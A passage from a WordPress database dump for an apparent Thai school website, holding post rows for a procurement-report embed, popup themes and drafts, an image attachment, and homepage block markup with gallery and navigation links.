expiration=\'false\' adManager=\'false\' adSource=\'false\' adFileUrl=\'false\' adFileUrl1=\'false\' adXPosition=\'false\' adYPosition=\'false\' adUrl=\'false\' adSkipButton=\'false\' embedpress_lock_content=\'false\' embedpress_protection_type=\'false\' embedpress_select_roles=\'false\' embedpress_lock_content_password=\'false\' embedpress_enable_footer_message=\'false\' embedpress_content_share=\'false\' embedpress_content_share_position=\'false\' embedpress_content_title=\'false\' embedpress_content_descripiton=\'false\' embedpress_content_share_custom_thumbnail=\'false\' embedpress_share_facebook=\'false\' embedpress_share_twitter=\'false\' embedpress_share_pinterest=\'false\' embedpress_share_linkedin=\'false\' align_tablet=\'false\' align_mobile=\'false\' nft_item_background_color=\'false\' nft_collectionname_color=\'false\' nft_collectionname_hover_color=\'false\' nft_collectionname_typography_typography=\'false\' nft_collectionname_typography_font_family=\'false\' nft_collectionname_typography_font_size=\'false\' nft_collectionname_typography_font_weight=\'false\' nft_collectionname_typography_text_transform=\'false\' nft_collectionname_typography_font_style=\'false\' nft_collectionname_typography_text_decoration=\'false\' nft_collectionname_typography_line_height=\'false\' nft_collectionname_typography_letter_spacing=\'false\' nft_collectionname_typography_word_spacing=\'false\' nft_title_color=\'false\' nft_title_typography_typography=\'false\' nft_title_typography_font_family=\'false\' nft_title_typography_font_size=\'false\' nft_title_typography_font_weight=\'false\' nft_title_typography_text_transform=\'false\' nft_title_typography_font_style=\'false\' nft_title_typography_text_decoration=\'false\' nft_title_typography_line_height=\'false\' nft_title_typography_letter_spacing=\'false\' nft_title_typography_word_spacing=\'false\' nft_creator_color=\'false\' nft_creator_typography_typography=\'false\' nft_creator_typography_font_family=\'false\' nft_creator_typography_font_size=\'false\' nft_creator_typography_font_weight=\'false\' nft_creator_typography_text_transform=\'false\' nft_creator_typography_font_style=\'false\' nft_creator_typography_text_decoration=\'false\' nft_creator_typography_line_height=\'false\' nft_creator_typography_letter_spacing=\'false\' nft_creator_typography_word_spacing=\'false\' nft_created_by_color=\'false\' nft_created_by_typography_typography=\'false\' nft_created_by_typography_font_family=\'false\' nft_created_by_typography_font_size=\'false\' nft_created_by_typography_font_weight=\'false\' nft_created_by_typography_text_transform=\'false\' nft_created_by_typography_font_style=\'false\' nft_created_by_typography_text_decoration=\'false\' nft_created_by_typography_line_height=\'false\' nft_created_by_typography_letter_spacing=\'false\' nft_created_by_typography_word_spacing=\'false\' nft_price_color=\'false\' nft_price_typography_typography=\'false\' nft_price_typography_font_family=\'false\' nft_price_typography_font_size=\'false\' nft_price_typography_font_weight=\'false\' nft_price_typography_text_transform=\'false\' nft_price_typography_font_style=\'false\' nft_price_typography_text_decoration=\'false\' nft_price_typography_line_height=\'false\' nft_price_typography_letter_spacing=\'false\' nft_price_typography_word_spacing=\'false\' nft_last_sale_color=\'false\' nft_last_sale_typography_typography=\'false\' nft_last_sale_typography_font_family=\'false\' nft_last_sale_typography_font_size=\'false\' nft_last_sale_typography_font_weight=\'false\' nft_last_sale_typography_text_transform=\'false\' nft_last_sale_typography_font_style=\'false\' nft_last_sale_typography_text_decoration=\'false\' nft_last_sale_typography_line_height=\'false\' nft_last_sale_typography_letter_spacing=\'false\' nft_last_sale_typography_word_spacing=\'false\' nftbutton_color=\'false\' nftbutton_bg_color=\'false\' nftbutton_typography_typography=\'false\' nftbutton_typography_font_family=\'false\' nftbutton_typography_font_size=\'false\' nftbutton_typography_font_weight=\'false\' nftbutton_typography_text_transform=\'false\' nftbutton_typography_font_style=\'false\' nftbutton_typography_text_decoration=\'false\' nftbutton_typography_line_height=\'false\' nftbutton_typography_letter_spacing=\'false\' nftbutton_typography_word_spacing=\'false\' nft_loadmore_color=\'false\' nft_loadmore_typography_typography=\'false\' nft_loadmore_typography_font_family=\'false\' nft_loadmore_typography_font_size=\'false\' nft_loadmore_typography_font_weight=\'false\' nft_loadmore_typography_text_transform=\'false\' nft_loadmore_typography_font_style=\'false\' nft_loadmore_typography_text_decoration=\'false\' nft_loadmore_typography_line_height=\'false\' nft_loadmore_typography_letter_spacing=\'false\' nft_loadmore_typography_word_spacing=\'false\' nft_loadmore_bgcolor=\'false\' nftrank_label_color=\'false\' nftrank_label_typography_typography=\'false\' nftrank_label_typography_font_family=\'false\' nftrank_label_typography_font_size=\'false\' nftrank_label_typography_font_weight=\'false\' nftrank_label_typography_text_transform=\'false\' nftrank_label_typography_font_style=\'false\' nftrank_label_typography_text_decoration=\'false\' nftrank_label_typography_line_height=\'false\' nftrank_label_typography_letter_spacing=\'false\' nftrank_label_typography_word_spacing=\'false\' nftrank_color=\'false\' nftrank_border_color=\'false\' nftrank_typography_typography=\'false\' nftrank_typography_font_family=\'false\' nftrank_typography_font_size=\'false\' nftrank_typography_font_weight=\'false\' nftrank_typography_text_transform=\'false\' nftrank_typography_font_style=\'false\' nftrank_typography_text_decoration=\'false\' nftrank_typography_line_height=\'false\' nftrank_typography_letter_spacing=\'false\' nftrank_typography_word_spacing=\'false\' nftdetail_title_color=\'false\' nftdetail_title_typography_typography=\'false\' nftdetail_title_typography_font_family=\'false\' nftdetail_title_typography_font_size=\'false\' nftdetail_title_typography_font_weight=\'false\' nftdetail_title_typography_text_transform=\'false\' nftdetail_title_typography_font_style=\'false\' nftdetail_title_typography_text_decoration=\'false\' nftdetail_title_typography_line_height=\'false\' nftdetail_title_typography_letter_spacing=\'false\' nftdetail_title_typography_word_spacing=\'false\' nftdetail_color=\'false\' nftdetail_typography_typography=\'false\' nftdetail_typography_font_family=\'false\' nftdetail_typography_font_size=\'false\' nftdetail_typography_font_weight=\'false\' nftdetail_typography_text_transform=\'false\' nftdetail_typography_font_style=\'false\' nftdetail_typography_text_decoration=\'false\' nftdetail_typography_line_height=\'false\' nftdetail_typography_letter_spacing=\'false\' nftdetail_typography_word_spacing=\'false\' nftdetail_link_color=\'false\' nftdetail_link_typography_typography=\'false\' nftdetail_link_typography_font_family=\'false\' nftdetail_link_typography_font_size=\'false\' nftdetail_link_typography_font_weight=\'false\' nftdetail_link_typography_text_transform=\'false\' nftdetail_link_typography_font_style=\'false\' nftdetail_link_typography_text_decoration=\'false\' nftdetail_link_typography_line_height=\'false\' nftdetail_link_typography_letter_spacing=\'false\' nftdetail_link_typography_word_spacing=\'false\' _title=\'false\' _element_width=\'false\' _element_width_tablet=\'false\' _element_width_mobile=\'false\' _element_custom_width=\'false\' _grid_column=\'false\' _grid_column_custom=\'false\' _grid_row=\'false\' _grid_row_custom=\'false\' _flex_align_self=\'false\' _flex_order=\'false\' _flex_order_custom=\'false\' _flex_size=\'false\' _flex_grow=\'false\' _flex_shrink=\'false\' _element_vertical_align=\'false\' _position=\'false\' _offset_orientation_h=\'false\' _offset_x=\'false\' _offset_x_end=\'false\' _offset_orientation_v=\'false\' _offset_y=\'false\' _offset_y_end=\'false\' _z_index=\'false\' _element_id=\'false\' _css_classes=\'false\' _element_cache=\'false\' _animation=\'false\' _animation_tablet=\'false\' _animation_mobile=\'false\' animation_duration=\'false\' _animation_delay=\'false\' _transform_rotate_popover=\'false\' _transform_rotateZ_effect=\'false\' _transform_rotateZ_effect_tablet=\'false\' _transform_rotateZ_effect_mobile=\'false\' _transform_rotate_3d=\'false\' _transform_rotateX_effect=\'false\' _transform_rotateX_effect_tablet=\'false\' _transform_rotateX_effect_mobile=\'false\' _transform_rotateY_effect=\'false\' _transform_rotateY_effect_tablet=\'false\' _transform_rotateY_effect_mobile=\'false\' _transform_perspective_effect=\'false\' _transform_perspective_effect_tablet=\'false\' _transform_perspective_effect_mobile=\'false\' _transform_translate_popover=\'false\' _transform_translateX_effect=\'false\' _transform_translateX_effect_tablet=\'false\' _transform_translateX_effect_mobile=\'false\' _transform_translateY_effect=\'false\' _transform_translateY_effect_tablet=\'false\' _transform_translateY_effect_mobile=\'false\' _transform_scale_popover=\'false\' _transform_keep_proportions=\'yes\' _transform_scale_effect=\'false\' _transform_scale_effect_tablet=\'false\' _transform_scale_effect_mobile=\'false\' _transform_scaleX_effect=\'false\' _transform_scaleX_effect_tablet=\'false\' _transform_scaleX_effect_mobile=\'false\' _transform_scaleY_effect=\'false\' _transform_scaleY_effect_tablet=\'false\' _transform_scaleY_effect_mobile=\'false\' _transform_skew_popover=\'false\' _transform_skewX_effect=\'false\' _transform_skewX_effect_tablet=\'false\' _transform_skewX_effect_mobile=\'false\' _transform_skewY_effect=\'false\' _transform_skewY_effect_tablet=\'false\' _transform_skewY_effect_mobile=\'false\' _transform_flipX_effect=\'false\' _transform_flipY_effect=\'false\' _transform_rotate_popover_hover=\'false\' _transform_rotateZ_effect_hover=\'false\' _transform_rotateZ_effect_hover_tablet=\'false\' _transform_rotateZ_effect_hover_mobile=\'false\' _transform_rotate_3d_hover=\'false\' _transform_rotateX_effect_hover=\'false\' _transform_rotateX_effect_hover_tablet=\'false\' _transform_rotateX_effect_hover_mobile=\'false\' _transform_rotateY_effect_hover=\'false\' _transform_rotateY_effect_hover_tablet=\'false\' _transform_rotateY_effect_hover_mobile=\'false\' _transform_perspective_effect_hover=\'false\' _transform_perspective_effect_hover_tablet=\'false\' _transform_perspective_effect_hover_mobile=\'false\' _transform_translate_popover_hover=\'false\' _transform_translateX_effect_hover=\'false\' _transform_translateX_effect_hover_tablet=\'false\' _transform_translateX_effect_hover_mobile=\'false\' _transform_translateY_effect_hover=\'false\' _transform_translateY_effect_hover_tablet=\'false\' _transform_translateY_effect_hover_mobile=\'false\' _transform_scale_popover_hover=\'false\' _transform_keep_proportions_hover=\'yes\' _transform_scale_effect_hover=\'false\' _transform_scale_effect_hover_tablet=\'false\' _transform_scale_effect_hover_mobile=\'false\' _transform_scaleX_effect_hover=\'false\' _transform_scaleX_effect_hover_tablet=\'false\' _transform_scaleX_effect_hover_mobile=\'false\' _transform_scaleY_effect_hover=\'false\' _transform_scaleY_effect_hover_tablet=\'false\' _transform_scaleY_effect_hover_mobile=\'false\' _transform_skew_popover_hover=\'false\' _transform_skewX_effect_hover=\'false\' _transform_skewX_effect_hover_tablet=\'false\' _transform_skewX_effect_hover_mobile=\'false\' _transform_skewY_effect_hover=\'false\' _transform_skewY_effect_hover_tablet=\'false\' _transform_skewY_effect_hover_mobile=\'false\' _transform_flipX_effect_hover=\'false\' _transform_flipY_effect_hover=\'false\' motion_fx_transform_x_anchor_point=\'false\' motion_fx_transform_y_anchor_point=\'false\' _background_background=\'false\' _background_color=\'false\' _background_color_stop=\'false\' _background_color_b=\'false\' _background_color_b_stop=\'false\' _background_gradient_type=\'false\' _background_gradient_angle=\'false\' _background_gradient_position=\'false\' _background_image=\'false\' _background_position=\'false\' _background_xpos=\'false\' _background_ypos=\'false\' _background_attachment=\'false\' _background_repeat=\'false\' _background_size=\'false\' _background_bg_width=\'false\' _background_video_link=\'false\' _background_video_start=\'false\' _background_video_end=\'false\' _background_play_once=\'false\' _background_play_on_mobile=\'false\' _background_privacy_mode=\'false\' _background_video_fallback=\'false\' _background_slideshow_gallery=\'false\' _background_slideshow_loop=\'false\' _background_slideshow_slide_duration=\'false\' _background_slideshow_slide_transition=\'false\' _background_slideshow_transition_duration=\'false\' _background_slideshow_background_size=\'false\' _background_slideshow_background_position=\'false\' _background_slideshow_lazyload=\'false\' _background_slideshow_ken_burns=\'false\' _background_slideshow_ken_burns_zoom_direction=\'false\' _background_hover_background=\'false\' _background_hover_color=\'false\' _background_hover_color_stop=\'false\' _background_hover_color_b=\'false\' _background_hover_color_b_stop=\'false\' _background_hover_gradient_type=\'false\' _background_hover_gradient_angle=\'false\' _background_hover_gradient_position=\'false\' _background_hover_image=\'false\' _background_hover_position=\'false\' _background_hover_xpos=\'false\' _background_hover_ypos=\'false\' _background_hover_attachment=\'false\' _background_hover_repeat=\'false\' _background_hover_size=\'false\' _background_hover_bg_width=\'false\' _background_hover_video_link=\'false\' _background_hover_video_start=\'false\' _background_hover_video_end=\'false\' _background_hover_play_once=\'false\' _background_hover_play_on_mobile=\'false\' _background_hover_privacy_mode=\'false\' _background_hover_video_fallback=\'false\' _background_hover_slideshow_gallery=\'false\' _background_hover_slideshow_loop=\'false\' _background_hover_slideshow_slide_duration=\'false\' _background_hover_slideshow_slide_transition=\'false\' _background_hover_slideshow_transition_duration=\'false\' _background_hover_slideshow_background_size=\'false\' _background_hover_slideshow_background_position=\'false\' _background_hover_slideshow_lazyload=\'false\' _background_hover_slideshow_ken_burns=\'false\' _background_hover_slideshow_ken_burns_zoom_direction=\'false\' _border_border=\'false\' _border_width=\'false\' _border_color=\'false\' _box_shadow_box_shadow_type=\'false\' _box_shadow_box_shadow=\'false\' _box_shadow_box_shadow_position=\'false\' _border_hover_border=\'false\' _border_hover_width=\'false\' _border_hover_color=\'false\' _box_shadow_hover_box_shadow_type=\'false\' _box_shadow_hover_box_shadow=\'false\' _box_shadow_hover_box_shadow_position=\'false\' _mask_switch=\'false\' _mask_shape=\'false\' _mask_image=\'false\' _mask_notice=\'false\' _mask_size=\'false\' _mask_size_scale=\'false\' _mask_position=\'false\' _mask_position_x=\'false\' _mask_position_y=\'false\' _mask_repeat=\'false\' hide_desktop=\'false\' hide_tablet=\'false\' hide_mobile=\'false\']https://docs.google.com/spreadsheets/d/18Al9i8m54QFeeHUxK9Yr6AVWTM3sifGz/edit?usp=sharing&#038;ouid=116408890257525538205&#038;rtpof=true&#038;sd=true[/embedpress]','รายงานการจัดซื้อจัดจ้างหรือจัดหาพัสดุ ปีงบประมาณ 2567','','inherit','closed','closed','','1571-revision-v1','','','2025-07-15 08:33:02','2025-07-15 01:33:02','',1571,'http://pakhaeng.ssk.in.th/?p=1872',0,'revision','',0),
(1873,1,'2025-07-16 08:25:29','2025-07-16 01:25:29','','Default Theme','','publish','closed','closed','','default-theme','','','2025-07-16 08:25:29','2025-07-16 01:25:29','',0,'http://pakhaeng.ssk.in.th/?p=1873',0,'popup_theme','',0),
(1874,1,'2025-07-16 08:25:29','2025-07-16 01:25:29','','Light Box','','publish','closed','closed','','lightbox','','','2025-07-16 08:25:29','2025-07-16 01:25:29','',0,'http://pakhaeng.ssk.in.th/?p=1874',0,'popup_theme','',0),
(1875,1,'2025-07-16 08:25:29','2025-07-16 01:25:29','','Enterprise Blue','','publish','closed','closed','','enterprise-blue','','','2025-07-16 08:25:29','2025-07-16 01:25:29','',0,'http://pakhaeng.ssk.in.th/?p=1875',0,'popup_theme','',0),
(1876,1,'2025-07-16 08:25:29','2025-07-16 01:25:29','','Hello Box','','publish','closed','closed','','hello-box','','','2025-07-16 08:25:29','2025-07-16 01:25:29','',0,'http://pakhaeng.ssk.in.th/?p=1876',0,'popup_theme','',0),
(1877,1,'2025-07-16 08:25:30','2025-07-16 01:25:30','','Cutting Edge','','publish','closed','closed','','cutting-edge','','','2025-07-16 08:25:30','2025-07-16 01:25:30','',0,'http://pakhaeng.ssk.in.th/?p=1877',0,'popup_theme','',0),
(1878,1,'2025-07-16 08:25:30','2025-07-16 01:25:30','','Framed Border','','publish','closed','closed','','framed-border','','','2025-07-16 08:25:30','2025-07-16 01:25:30','',0,'http://pakhaeng.ssk.in.th/?p=1878',0,'popup_theme','',0),
(1879,1,'2025-07-16 08:25:30','2025-07-16 01:25:30','','Floating Bar - Soft Blue','','publish','closed','closed','','floating-bar','','','2025-07-16 08:25:30','2025-07-16 01:25:30','',0,'http://pakhaeng.ssk.in.th/?p=1879',0,'popup_theme','',0),
(1880,1,'2025-07-16 08:25:30','2025-07-16 01:25:30','','Content Only - For use with page builders or block editor','','publish','closed','closed','','content-only','','','2025-07-16 08:25:30','2025-07-16 01:25:30','',0,'http://pakhaeng.ssk.in.th/?p=1880',0,'popup_theme','',0),
(1881,1,'2025-07-16 08:25:30','2025-07-16 01:25:30','You can see how this popup was set up in our step-by-step guide: https://wppopupmaker.com/guides/auto-opening-announcement-popups/','Example: Auto-opening announcement popup','','publish','closed','closed','','example-auto-opening-announcement-popup','','','2025-07-16 08:25:30','2025-07-16 01:25:30','',0,'http://pakhaeng.ssk.in.th/?p=1881',0,'popup','',0),
(1882,1,'2025-07-16 08:26:12','0000-00-00 00:00:00','','ถวายพระพร ร.๑๐','','draft','closed','closed','','','','','2025-07-16 08:26:12','2025-07-16 01:26:12','',0,'http://pakhaeng.ssk.in.th/?post_type=popup&#038;p=1882',0,'popup','',0),
(1885,1,'2025-07-16 09:12:25','2025-07-16 02:12:25','','สีเขียว สีเหลือง น่ารัก ภาพประกอบ ยินดีต้อนรับ เปิดเทอม แบนเนอร์ (297 x 210 มม.) (เว็บไซต์)','','inherit','','closed','','%e0%b8%aa%e0%b8%b5%e0%b9%80%e0%b8%82%e0%b8%b5%e0%b8%a2%e0%b8%a7-%e0%b8%aa%e0%b8%b5%e0%b9%80%e0%b8%ab%e0%b8%a5%e0%b8%b7%e0%b8%ad%e0%b8%87-%e0%b8%99%e0%b9%88%e0%b8%b2%e0%b8%a3%e0%b8%b1%e0%b8%81','','','2025-07-16 09:12:25','2025-07-16 02:12:25','',0,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/สีเขียว-สีเหลือง-น่ารัก-ภาพประกอบ-ยินดีต้อนรับ-เปิดเทอม-แบนเนอร์-297-x-210-มม.-เว็บไซต์.png',0,'attachment','image/png',0),
(1888,1,'2025-07-16 09:56:01','2025-07-16 02:56:01','','ร่วมลงนามถวายพระพร','','publish','closed','closed','','%e0%b8%a3%e0%b9%88%e0%b8%a7%e0%b8%a1%e0%b8%a5%e0%b8%87%e0%b8%99%e0%b8%b2%e0%b8%a1%e0%b8%96%e0%b8%a7%e0%b8%b2%e0%b8%a2%e0%b8%9e%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a3','','','2025-07-16 10:09:06','2025-07-16 03:09:06','',0,'http://pakhaeng.ssk.in.th/?post_type=popupbuilder&#038;p=1888',0,'popupbuilder','',0),
(1889,1,'2025-07-16 10:09:15','2025-07-16 03:09:15','','ร่วมลงนามถวายพระพร','','inherit','closed','closed','','1888-autosave-v1','','','2025-07-16 10:09:15','2025-07-16 03:09:15','',1888,'http://pakhaeng.ssk.in.th/?p=1889',0,'revision','',0),
(1897,1,'2025-07-16 11:06:56','0000-00-00 00:00:00',' ','','','draft','closed','closed','','','','','2025-07-16 11:06:56','0000-00-00 00:00:00','',0,'http://pakhaeng.ssk.in.th/?p=1897',1,'nav_menu_item','',0),
(1898,1,'2025-07-16 11:15:01','2025-07-16 04:15:01','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_e96e1d-10\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_cddd30-7b\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_cddd30-7b\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_8eda8b-3a\",\"columns\":[1,1,1,1,1,1],\"thumbSize\":\"full\",\"ids\":[666,668],\"type\":\"carousel\",\"imageRatio\":\"land169\",\"autoPlay\":true,\"transSpeed\":1000,\"slidesScroll\":\"all\",\"arrowStyle\":\"none\",\"dotStyle\":\"light\",\"imagesDynamic\":[{\"id\":666,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=666\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"width\":1600,\"height\":900},{\"id\":668,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=668\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"width\":1600,\"height\":900}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_386744-46\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=1523\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://script.google.com/macros/s/AKfycbxEPByU7gv9jSnVVgZ9Epw9Zr5jO-O8WnCpXvsB67C6vI1y9u66n4BYnLjRvd9FT-si/exec\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=476\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=563\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_3c234c-51\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_3c234c-51\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_bead82-d8\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?page_id=469\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_941599-c9\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_941599-c9 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_67d38e-c6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_67d38e-c6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\" data-type=\"page\" data-id=\"650\">ข้อมูลพื้นฐาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_4b01f7-65\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_4b01f7-65\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=643\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_61e97e-78\"} -->\n<li class=\"wp-block-kadence-listitem 